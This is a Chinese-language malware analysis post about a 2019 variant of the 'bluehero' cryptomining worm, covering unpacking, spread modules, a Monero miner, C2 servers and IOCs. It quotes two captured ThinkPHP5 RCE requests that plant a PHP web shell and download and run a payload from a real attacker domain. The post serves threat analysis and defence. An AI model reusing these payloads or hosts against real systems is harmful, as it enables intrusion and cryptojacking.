内容简介:捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68bupx脱壳
0x00 概述
捕获到利用thinkphp5 rce漏洞的攻击记录,经分析为bluehero新变种,编译时间为20190604。
attack:http://1.2.3.4:80/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET[‘xcmd’];system($action);?^>>hydra.php; attack:http://1.2.3.4:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile(‘http://fid.hognoob.se/download.exe’,’SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe’);start SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe;
0x01 逆向分析
download.exe:
SHA256:6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
upx脱壳
upx.exe -d “” -o “”
编译时间戳
2019-06-04 04:26:51
PEID
- PE: packer: UPX(3.94)[NRV,brute]
- PE: compiler: Microsoft Visual C/C++(6.0)[-]
- PE: linker: Microsoft Linker(6.0)[EXE32]
入口所在段
UPX1
镜像基地址
0x400000
入口点(OEP)
0x4dcc0
下载母体文件
存储到%SystemRoot%\Temp\SunloglicySrv.exe。
SunloglicySrv.exe
upx脱壳
下载配置
http://uio.hognoob.se:63145/cfg.ini
生成ip段
获取本地IP地址,访问http://2019.ip138.com/ic.asp 获取所在公网ip,将生成的ip段包括所在公网的B段,以及随机生成的公网地址保存为ip.txt,启动端口扫描 工具 对ip的139/445端口进行扫描,将扫描结果保存到result.txt。
用masscan扫描内网和外网的端口
永恒之蓝攻击(32/64)
cve-2019-2725攻击
ipc$爆破
利用内置密码字典进行ipc$远程爆破,爆破登录成功后在目标机器利用psexec工具或者wmic执行远程命令植入木马程序。
cve-2017-5638攻击
cve-2017-10271攻击
好像和2725用的是相同的payload。
thinkphp5 rce攻击
tomcat put 攻击
0x02 流量分析
download.exe
SunloglicySrv.exe下载cfg.ini
爆破mssql-1433
0x03 行为分析
SystemRoot/Temp/wtrgaltqtqzkxtb28962.exe(即download.exe)
运行后自删除,并释放后门文件ucokcu.exe(随机六字母文件名)
该程序没有图标,没文件名,具有隐蔽性,后门程序作为系统服务启动。
download.exe下载病毒母体SunloglicySrv.exe
写入到C:\webkitssdk\2.7.92\目录下(不确定是SunloglicySrv.exe还是ucokcu.exe,按微步的沙箱看应该是ucokcu.exe)
木马后门黑客服务器ip。
SunloglicySrv.exe
下载挖矿配置cfg.ini
释放一堆文件:
zunnrhu.exe和SunloglicySrv.exe基本一样,含有多种攻击模块。
ipc$爆破,利用mimikatz读取密码。
疑似端口扫描程序。
永恒之蓝。
cve-2017-8464。
生成ip段
利用procdump和psexec。
矿机程序,xmrig挖门罗币。
upx脱壳
矿池
添加计划任务。
添加服务。
攻击7001,weblogic漏洞。
连接黑客服务器80.82.70.188:35791(远控)
相关进程。
0x04 关联分析
fid.hognoob.se
注册时间2019-03-01 00:00:00
过期时间2020/3/1 0:00:00
45.67.14.164(英国 英格兰 伦敦)
21/tcp open ftp Pure-FTPd
80/tcp open http nginx
9898/tcp open http Ajenti http control panel
fid.hognoob.se服务器iP:
当前解析:
英国45.67.14.164
历史解析记录:
2019-05-15—–2019-06-1445.67.14.164
2019-05-08—–2019-05-08195.128.124.189
2019-04-27—–2019-04-28195.128.124.159
2019-04-15—–2019-04-18195.128.127.237
2019-04-01—–2019-04-1145.67.14.168
2019-03-17—–2019-03-19195.128.127.254
2019-03-13—–2019-03-1345.79.66.44
bt宝塔面板
45.67.14.164
英国 英格兰 伦敦
运营商:pitcommunications.net
195.128.124.140
XMRCoinMiner挖矿木马
运营商:inoventica.ru
俄罗斯莫斯科
80.82.70.234
荷兰 阿姆斯特丹Ecatel公司
185.164.72.143
iis7.5
猜测攻击者应该是欧洲的。
0x05 IOC
http://fid.hognoob.se/download.exe (45.67.14.164)//19日更改解析ip(80.82.70.234)//22日更改解析为127.0.0.1/ 185.164.72.143 ( 荷兰北阿姆斯特丹/伊朗 )
SHA-256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b
http://fid.hognoob.se/ S unloglicySrv.exe
SHA-256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81
http://uio.hognoob.se:63145/cfg.ini (45.67.14.166)
195.128.124.140
0x06 结语
总体来说,v20190604版本和之前的bluehero版本差别不大,也可能是分析不完全,如有错漏,欢迎指点!
0x07 参考资料
v201808
https://www.freebuf.com/column/180544.html
v201903
https://s.tencent.com/research/report/675.html
v201905
以上所述就是小编给大家介绍的《bluehero挖矿蠕虫新变种v20190604简单分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:- Bluehero挖矿蠕虫变种空降!
- DDG 3013 变种: 基于 Redis 未授权访问的挖矿蠕虫简要分析
- Window应急响应(二):蠕虫病毒
- 西门子PLC蠕虫病毒研究
- 基于社交媒体的csrf蠕虫风暴探索
- 劫持“驱动人生”的挖矿蠕虫再次活跃
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
HTML 编码/解码
HTML 编码/解码
Base64 编码/解码
Base64 编码/解码